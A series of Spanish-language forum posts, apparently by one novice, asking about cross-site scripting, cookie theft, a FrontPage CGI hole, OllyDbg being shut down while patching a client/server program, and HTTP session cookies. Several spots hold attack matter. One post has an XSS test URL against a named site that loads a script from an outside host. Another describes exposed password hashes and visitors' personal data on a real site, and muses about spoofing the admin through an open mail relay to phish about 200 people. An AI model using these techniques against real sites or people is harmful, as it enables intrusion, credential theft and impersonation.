Recien estoy aprendiendo estoy y leyendo algunos papers, tengo unas dudas..

1) porque esto SI se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>

y esto NO se ejecuta:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>

 

2) cuando se roban cookies... son cookies de la pagina vulnerable o no?

Gracias.

hola, hace un tiempo me dio una mano un amigo. Hay que tener el frontpage instalado en tu maquina, ir a archivo, abrir pagina web poner la direccion y te va a pedir el user y pass, el user y pass suele estar en algun archivo por ahi o incluso se puede usar google para encontrar esta vulnerabilidad. El pass se puede encontrar con el John, pero bueno supongo que pueden ser 2 horas o 2 años...

hace un tiempo encontre una maquina de mi facultad con un user sin password y le avise al admin y me trataron como a un discapacitado mental...
 

Encontré una vulnerabilidad cgi (muy conocida) que muestra el nombre de usuario y password cifrado (--> john de ripper) de una página hecha en frontpage, vengo de buscar al webmaster para avisarle de esto, pero no lo encontré, tengo que ir mas tarde. Ademas se puede acceder a un montén de datos de usuarios por otras vulnerabilidades cgi, como un archivo con todos los datos de personas que envian mensajes al administrador por un form (nombre, edad, mail, telefono y motivo) y otra cosa es que también se pueden mandar mails desde su servidor ESMTP con una sesion anónima, entonces se podria enviar mails a todas las aproximadamente 200 personas de las que hay datos haciendose pasar por el admin (incluso llamarlas por telefono) y hacerles descargar lo que sea hasta conseguir mas datos sobre esas personas.

En el archivo PWD hay un user sin password y creo que álguien penetró y creó una cuenta sin password porque me imagino que en ese momento no sabria como escribir su password cifrado en el archivo. Esto es solo una suposición.

Mi duda es... dónde se ingresan estos datos (user y pass)?, no es para hacer ningun daño, solo para saber. Leí, pero no entendí bien, que se necesita tener el frontpage full en la máquina atacante para acceder, pero no entiendo porque ni siquiera tengo a mano el programa para ver.

Gracias.

me pasó en varias maquinas, ni siquiera debuggeaba el cliente, solo el server, pero si mientras estaba el olly ejecutandose tambien estaba el cliente... el olly se apagaba. Quizás solo la protección consistia en ver que procesos están ejecutándose y si hay algún debugger conocido apagarlo. Voy a intentar cambiarle el nombre al olly, pero esto no creo que funcione seria una protección muy pobre jajajajaj.

Lo que hice fue cualquier cosa, ni siquiera se le puede cambiar el nombre al Olly, si se lo cambio no funciona porque dice que no se encuentra el archivo OLLYDBG.exe

Igual ya terminé con mi trabajo... debuggeando, modificando el ejecutable del server y probandolo con el cliente. Una y otra vez hasta que di en el clavo.

Muchas gracias por interesarte ShadowDark 

Hace unos dias que empecé con un trabajito con el olly y mientras lo hice en mi casa fue de diez, pero si estoy en un cyber o en la máquina de algún conocido y quiero adelantar un poco, cuando me descargo el olly de su página e intento ejecutar sucede que descarga mal el zip o ni bien lo ejecuto se apaga el olly. Esto no sucede con la version que tengo descagada de hace tiempo en mi casa. Alguien sabe algo?

-----------------------------
Creo que lo resolví.

Estoy trabajando con un cliente y un servidor.
Cuando debuggeaba el server solo estaba todo bien, cuando ejecutaba el olly con el cliente corriendo tambien en la misma maquina me cerraba el olly. listo. Si quieren borrar el post OK. Saludos.

ah, como puedo evitar esto?? hay algun parche para el olly o algo por el estilo?

¿como que nadie la ha visto? cada vez que necesito cosas de winsock --> http://www.msdn.microsoft.com, pero casi todo lo que esta en español esta traducido con programas traductores que son bastante "frios" por esto NO te recomendaria tanto este link:

http://msdn2.microsoft.com/es-es/library/default.aspx

qizas lo que estes buscando es tener un compedio directamente en tu maquina, pero no creo que sea necesario si te manejas bien en la pagina y tenes un minimo grado de ingles.

Alguien tiene o conoce algún link con el código fuente de algún servidor proxy? Gracias.

Gracias Universal SAC por interesarte, paso a explicarme un poco mejor: viste que con el protocolo http, para pedir las paginas el browser (IExplorer, Firefox, etc..) envia peticiones GET que tienen mas o menos la siguiente forma:

GET /index.html HTTP/1.1
 Host: www.example.com
 User-Agent: HTTPTool/1.0
 Connection: close
 [Línea en blanco]

esa seria la peticion que haria el browser al servidor cuando uno pega la siguiente url en la barra de direcciones: www.example.com/index.html

por ejemplo si te conectas a www.elhacker.net, como en muchas otras paginas mas, cuando te logueas estas peticiones tiene un campo "Cookie: bla bla bla"
Pudiendo ser algo asi (totalmente imaginario)

GET /foro_de_php.php HTTP/1.1
 Host: www.elhacker.net
 User-Agent: HTTPTool/1.0
 Connection: close
Cookie: cookieUser=achernar, pass=1234567890, PHPSESID=AFS54AD8F9ASa65df94FA6D
 [Línea en blanco]

Esta peticion se haria cuando, ya logueados, hicieramos clic en un link que diga www.elhacker.net/foro_de_php.php

(Esto se ve con un sniffer)

ahora si en lugar de hacer clic yo copio esa url (www.elhacker.net/foro_de_php.php) y la pego en una nueva ventana... el server me va a responder asignandome un nuevo PHPSESID para esa ventana. O sea, voy a tener dos ventanas, pero cada una va a tener un PHPSESID diferente.

El PHPSESID no va enviado por la url, sino que es enviada por el server en sus repuestas que tienen mas o menos esta forma:

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2003 23:59:59 GMT
Content-Type: text/html
SetCookie: PHPSESID = nuevo valor
Content-Length: 1221

<html>
<body>
<h1>Página principal de tuHost</h1>
(Contenido)
  .
  .
  .
</body>
</html>

Resumiendo:
me logueo en una pagina y en una de las siguientes respuestas del server me envia un valor de PHPSESID que voy a tener que usar en mis siguientes peticiones, todos los links que clickee en la pagina va a resultar en peticiones hechas por el browser al server con este valor de PHPSESID, pero si en lugar de hacer click en el link, pego su url en una nueva ventana, el server me asigna un nuevo valor de PHPSESID porque como el PHPSESID no viaja en la url (en este ejemplo) el server no deve verificar las ip, sino que solamente las PHPSESID, y paraciera que no tiene forma de saber que la nueva ventana esta en la misma maquina. Sin embargo si mantiene mi user logueado. Es un verdadero misterio para mi.

Me parece que quizas ya estoy un poco pesado con las cabecera http, pero es que todavia nunca me habia metido con este protocolo.

Esta es la situacion:

1) abro una pagina en una ventana
2) guarda en mis cookies un valor de PHPSESID
3) si hago clics en sus links, las peticiones GET contienen el
    valor PHPSESID en el campo cookie de la cabecera.
4) si copio la url de un link y lo pego en la barra de direcciones
    en la misma ventana, tambien las peticiones GET van acompañadas
    de este valor PHPSESID en el campo cookie de la cabecera
5) si copio la url de un link y lo pego en la barra de direcciones
    en una nueva ventana la peticion no lleva el PHPSESID, y la respuesta
    del server me asigna uno diferente para esta nueva ventana.

para que sirve el PHPSESID?

Es posible que con esto el servidor se de cuenta de, por ejemplo, si una sesion esta siendo robada? o que estamos usando algun tipo de bot?

ademas... aùn para la misma pagina. Cada ventana tiene una cookie o este valor se guarda en algun archivo temporal de cada ventana?

lo que esta en negrita... ¿indica que el contenido esta comprimido?¿Por esto no veo el codigo html con el sniffer?

si es asi, el hecho de que lo mande comprimido, se es porque siempre la pagina es enviada comprimida o porque la peticion del cliente fue que se envie comprimida?

-------------------------------------------------------------------------------------

LISTO YA LO RESOLVÌ, mande un request con la siguiente modificaciòn


y me respondio con esto y despues todo el codigo en html


hay alguna forma de configurar el IE para que haga las peticiones de modo que los datos no viajen comprimidos?